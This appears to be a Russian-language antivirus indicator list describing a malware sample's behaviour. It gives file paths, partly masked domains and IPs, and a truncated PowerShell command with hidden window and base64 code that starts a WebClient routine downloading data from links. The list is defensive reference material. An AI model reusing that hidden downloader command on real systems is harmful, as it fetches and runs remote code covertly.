Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe
- %TEMP%\content\1004-1828-wscript.exe-23-56-26-329.dump
- 'up#####eimagens.com.br':443
- '18#.#16.70.134':80
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB039D4329A5E8.crt?87##############
- http://18#.#16.70.134/101.txt
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRz... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe'